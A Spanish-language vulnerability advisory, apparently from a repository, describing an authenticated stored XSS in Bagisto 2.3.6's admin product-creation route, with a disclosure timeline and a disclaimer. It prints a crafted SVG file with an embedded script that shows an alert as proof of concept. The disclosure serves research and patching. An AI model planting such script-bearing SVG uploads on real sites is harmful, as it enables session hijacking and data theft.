
Prueba de concepto para una vulnerabilidad XSS almacenado en el panel de administración de Bagisto, que demuestra la carga de SVG con JavaScript malicioso y proporciona recomendaciones de mitigación.
Existe una vulnerabilidad de XSS almacenado autenticado en la ruta de creación de productos del panel de administración de Bagisto 2.3.6, que permite a un atacante subir un archivo SVG manipulado que contiene código JavaScript malicioso. Esta vulnerabilidad puede ser explotada por un usuario administrador autenticado para ejecutar JavaScript arbitrario en el navegador, lo que potencialmente puede conducir al secuestro de sesiones, robo de datos o acciones no autorizadas.
La vulnerabilidad se explota cuando un administrador autenticado sube un archivo SVG manipulado que contiene JavaScript malicioso.
Pasos para Reproducir:
Ejemplo de Carga Útil SVG Maliciosa:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert(document.domain);
</script>
</svg>
| Fecha | Acción |
|---|---|
| AGO 2025 | Vulnerabilidad Descubierta |
| AGO 2025 | Divulgación Responsable |
| AGO 2025 | ID CVE Solicitado a MITRE |
| OCT 2025 | CVE Asignado, Divulgación Pública |
La información y el código de prueba de concepto (PoC) proporcionados en este repositorio son únicamente con fines educativos y de investigación ética. El autor no es responsable de ningún uso indebido o daño causado por la información o el código proporcionado aquí. El usuario asume toda la responsabilidad por sus acciones. Es responsabilidad del usuario asegurarse de cumplir con todas las leyes locales, estatales y federales aplicables.